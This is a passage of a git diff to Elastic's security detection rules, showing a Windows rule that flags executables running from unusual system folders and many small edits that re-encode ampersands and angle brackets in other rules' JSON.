cff92c41-2225-4763-b4ce-6f71e5bda5e6\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n /* add suspicious execution paths here */\n process.executable : (\n \"?:\\\\PerfLogs\\\\*.exe\", \"?:\\\\Users\\\\Public\\\\*.exe\", \"?:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"?:\\\\Intel\\\\*.exe\", \"?:\\\\AMD\\\\Temp\\\\*.exe\", \"?:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\n \"?:\\\\Windows\\\\Branding\\\\*.exe\", \"?:\\\\Windows\\\\csc\\\\*.exe\", \"?:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\n \"?:\\\\Windows\\\\en-US\\\\*.exe\", \"?:\\\\Windows\\\\wlansvc\\\\*.exe\", \"?:\\\\Windows\\\\Prefetch\\\\*.exe\",\n \"?:\\\\Windows\\\\Fonts\\\\*.exe\", \"?:\\\\Windows\\\\diagnostics\\\\*.exe\", \"?:\\\\Windows\\\\TAPI\\\\*.exe\",\n \"?:\\\\Windows\\\\INF\\\\*.exe\", \"?:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\", \"?:\\\\windows\\\\tracing\\\\*.exe\",\n \"?:\\\\windows\\\\IME\\\\*.exe\", \"?:\\\\Windows\\\\Performance\\\\*.exe\", \"?:\\\\windows\\\\intel\\\\*.exe\",\n \"?:\\\\windows\\\\ms\\\\*.exe\", \"?:\\\\Windows\\\\dot3svc\\\\*.exe\", \"?:\\\\Windows\\\\panther\\\\*.exe\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.exe\", \"?:\\\\Windows\\\\OCR\\\\*.exe\", \"?:\\\\Windows\\\\appcompat\\\\*.exe\",\n \"?:\\\\Windows\\\\apppatch\\\\*.exe\", \"?:\\\\Windows\\\\addins\\\\*.exe\", \"?:\\\\Windows\\\\Setup\\\\*.exe\",\n \"?:\\\\Windows\\\\Help\\\\*.exe\", \"?:\\\\Windows\\\\SKB\\\\*.exe\", \"?:\\\\Windows\\\\Vss\\\\*.exe\",\n \"?:\\\\Windows\\\\Web\\\\*.exe\", \"?:\\\\Windows\\\\servicing\\\\*.exe\", \"?:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"?:\\\\Windows\\\\Logs\\\\*.exe\", \"?:\\\\Windows\\\\WaaS\\\\*.exe\", \"?:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.exe\", \"?:\\\\Windows\\\\PLA\\\\*.exe\", \"?:\\\\Windows\\\\Migration\\\\*.exe\",\n \"?:\\\\Windows\\\\debug\\\\*.exe\", \"?:\\\\Windows\\\\Cursors\\\\*.exe\", \"?:\\\\Windows\\\\Containers\\\\*.exe\",\n \"?:\\\\Windows\\\\Boot\\\\*.exe\", \"?:\\\\Windows\\\\bcastdvr\\\\*.exe\", \"?:\\\\Windows\\\\assembly\\\\*.exe\",\n \"?:\\\\Windows\\\\TextInput\\\\*.exe\", \"?:\\\\Windows\\\\security\\\\*.exe\", \"?:\\\\Windows\\\\schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\SchCache\\\\*.exe\", \"?:\\\\Windows\\\\Resources\\\\*.exe\", \"?:\\\\Windows\\\\rescache\\\\*.exe\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.exe\", \"?:\\\\Windows\\\\PrintDialog\\\\*.exe\", \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\n \"?:\\\\Windows\\\\media\\\\*.exe\", \"?:\\\\Windows\\\\Globalization\\\\*.exe\", \"?:\\\\Windows\\\\L2Schemas\\\\*.exe\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.exe\", \"?:\\\\Windows\\\\ModemLogs\\\\*.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\"\n ) and\n \n not process.name : (\n \"SpeechUXWiz.exe\", \"SystemSettings.exe\", \"TrustedInstaller.exe\",\n \"PrintDialog.exe\", \"MpSigStub.exe\", \"LMS.exe\", \"mpam-*.exe\"\n ) and\n not process.executable :\n (\"?:\\\\Intel\\\\Wireless\\\\WUSetupLauncher.exe\",\n \"?:\\\\Intel\\\\Wireless\\\\Setup.exe\",\n \"?:\\\\Intel\\\\Move Mouse.exe\",\n \"?:\\\\windows\\\\Panther\\\\DiagTrackRunner.exe\",\n \"?:\\\\Windows\\\\servicing\\\\GC64\\\\tzupd.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\RemoteLite.exe\",\n \"?:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\*.exe\",\n \"?:\\\\Users\\\\Public\\\\Documents\\\\syspin.exe\",\n \"?:\\\\Users\\\\Public\\\\res\\\\FileWatcher.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json index c265f7738b3..1c8fb638a1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json index b44e8cfca61..f4094f0071f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ec604672-bed9-43e1-8871-cf591c052550_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json index 1dbff8f0777..8c4ccc3e550 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_101.json @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json index 79f2f413122..ccfc060f3ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_102.json @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json b/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json index e2abb92c0c1..c5b5c3f1780 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ecd4857b-5bac-455e-a7c9-a88b66e56a9e_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json index 3934fe8329d..f265f3264ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json index 73097327e81..1357e398150 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json index fd91c3b05d1..5666970982b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json index a6134771374..b557f43c475 100644 --- a/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json +++ b/packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json index 3311afe2269..367c87b29b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_101.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json index 1fa05448b63..620040602a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ed9ecd27-e3e6-4fd9-8586-7754803f7fc8_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json index 50de1df0bf6..3b2bfeded3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_104.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json index de61db634ca..2b051cffc4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_105.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json index f94459397fc..648ae8ce3e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_106.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json index f2561305927..e28e097c019 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_107.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json index 86be9b28d08..f23f95d4434 100644 --- a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_108.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json index 459f4dac54b..54957b37258 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json index 2ca451ca3c2..c5a0a35a847 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json index 9d8a33048dc..a3f81415118 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json index cd0117f3392..0aba2a59125 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json index 9f15198174d..2851fcf6f78 100644 --- a/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json +++ b/packages/security_detection_engine/kibana/security_rule/edb91186-1c7e-4db8-b53e-bfa33a1a0a8a_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json index 30ba3d0baf4..be98a594dda 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json index 7d51b04c8c9..6fdbe5d1470 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_105.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json index 3c3158ffe31..5c05ab4beb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_106.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json index 66c7d3b6340..c55b20e8c0c 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_107.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions 